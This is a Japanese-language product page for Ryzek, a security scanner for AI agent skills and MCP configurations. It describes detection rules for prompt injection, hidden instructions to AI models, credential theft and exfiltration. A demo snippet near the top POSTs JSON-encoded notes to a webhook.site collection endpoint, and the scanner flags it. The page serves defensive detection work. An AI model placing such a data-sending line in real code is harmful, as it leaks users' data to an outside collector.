AIエージェントのためのセキュリティスキャン
エージェントが実行する前に、そのスキルが何をするか知る。
Ryzekはスキル、MCPサーバー設定、ツールマニフェストを読み取り、プロンプトインジェクション、隠された指示、認証情報の窃取、広すぎる権限、承認後に変更されたツールを検出します。すべての検出結果に信頼度スコアと理由が付きます。
Freeプラン:月20回のスキャン、全ルール対応。スキャンしたファイルはメモリ上で読み込まれ、保存されることはありません。
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzekは1件の問題を検出しました
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
このページのビルド時に生成された、実際のスキャナー出力です。
トレーラー
80秒でわかるRyzek。
エージェントにひそかに渡されているもの — そして実行される前にRyzekが見せてくれるもの。
仕組み
アップロードから、行動につながる判定まで。
インストール不要。サインインしてファイルを追加し、Ryzekが検出した内容とその理由を確認できます。
-
01・サインイン
無料アカウントを作成
お持ちのアカウントでサインインするだけです。スキャン利用枠とツール履歴は、どのデバイスからでも引き継がれます。
-
02・ファイルを追加
エージェントが読み込むものをドロップするだけ
スクリプトを含むスキルフォルダ、MCP設定、ツールマニフェスト、
package.jsonまたはrequirements.txt。 -
03・結果を読む
フラグだけでなく、理由も
各検出結果には、重大度、Ryzekの確信度とその理由、トリガーとなった正確なテキスト、OWASPカテゴリが表示されます。
-
04・再スキャン
ツールが変更されたら知る
Ryzekは各ツールのフィンガープリント(ファイル自体ではありません)を保持するため、後のスキャンで承認済みの何かが変更されたかどうかを知らせることができます。
検出できること
5種類のリスクにまたがる54件のルール。
すべてのルールはルールページでライブデモを確認できます。ファイル、重要な部分、そしてスキャナーが実際に報告する内容がわかります。
18件のルール・エージェントセーフティ
AI宛てのテキスト
プロンプトインジェクション、コメントや見えない文字に隠された指示、偽装されたツール結果、メモリ汚染。
5件のルール・情報流出
データが外部へ出る経路
収集エンドポイント、DNSトンネリング、画像ビーコン、非公開の読み取りと公開の書き込みを組み合わせたツール。
7件のルール・認証情報
あるべきでない場所にあるシークレット
ハードコードされたキー、MCP設定内のトークン、認証情報ストアやシェル履歴の読み取り、クラウドメタデータへのリクエスト。
13件のルール・サプライチェーン
コードの出どころ
固定されていない・なりすましのサーバー、既知の脆弱バージョン、インストールフック、シャドウサーバー、承認後に変更されたツール。
11件のルール・実行
必要以上に強力な権限
広すぎる権限、自動承認されたツール、サンドボックスエスケープ、永続化、コマンドインジェクション。
すべてのルール
すべてのデモを見る →
リスクで絞り込み、平易な説明を読み、各ルールの実際の結果を確認できます。
Ryzekを選ぶ理由
自分の目で確認できる検出結果を、どこまで見えるかを明示するスキャナーから。
誤報ばかりのスキャナーは無視され、過大に主張するスキャナーは信頼すべきでないときに信頼されてしまいます。Ryzekはそのどちらも避けるよう作られています。
Ryzekが見えないものを確認 — サーバー稼働中にのみ現れる挙動や、コンパイル済みプログラムの内部を含みます。
- すべての検出結果に理由を明示。ルールがどの程度確信しているか、そしてなぜそう判断したか — 低信頼度のヒントが確定した攻撃のように見えないようにします。
- 変更検知。承認後にひそかに変更されたツールは、次回のスキャンで検出されます。
- ファイルは保持されません。アップロードされたファイルはメモリ上でスキャンされ、破棄されます。保存するのはスキャン回数とツールのフィンガープリントのみで、内容は保存しません。
- OWASPに対応づけ。すべてのルールはOWASP MCP Top 10のいずれかのカテゴリに対応づけられています。
- すべてのプランで、すべてのルール。有料プランが追加するのはスキャン量と自動化であり、検出機能ではありません。
料金
無料で始める。全ルール対応。
Freeプランでも全ルールセットが動作し、上限は回数のみです。より高い上限を持つ有料プランは近日公開予定です。
質問
よくある質問。
スキャンしたファイルは保存されますか?
いいえ。ファイルはHTTPS経由でスキャナーに送信され、メモリ上でスキャンされ、結果が返された時点で破棄されます。保存するのは利用したスキャン回数と、各ツールのフィンガープリント(ハッシュと権限ラベル)のみで、これにより変更をお知らせできます。詳細はプライバシーポリシーをご覧ください。
なぜアカウントが必要なのですか?
スキャン利用枠とツール履歴は、あなたと一緒にどこへでも移動します。変更検知は、前回スキャンした時点のツールの姿をRyzekが覚えていて初めて機能します。
どんなファイルをスキャンできますか?
スキルフォルダ(SKILL.mdと付随するスクリプト)、.mcp.jsonやclaude_desktop_config.jsonなどのMCP設定ファイル、JSONツールマニフェスト、そしてインストールフックや脆弱な依存関係を確認するためのpackage.jsonやrequirements.txt。
検出結果がクリーンなら、そのスキルは安全ということですか?
いいえ — それは54件のルールのいずれにも一致しなかったという意味です。Ryzekはファイルを読み取るだけで実行はしないため、実行時にのみ現れる挙動や、コンパイル済みプログラムの内部までは見えません。クリーンなスキャン結果は良い兆候ではありますが、保証ではありません。
CIで実行できますか?
まだです。CI連携は有料プランで計画されています。重要だと思われる場合はお知らせください — 優先順位を決める参考にします。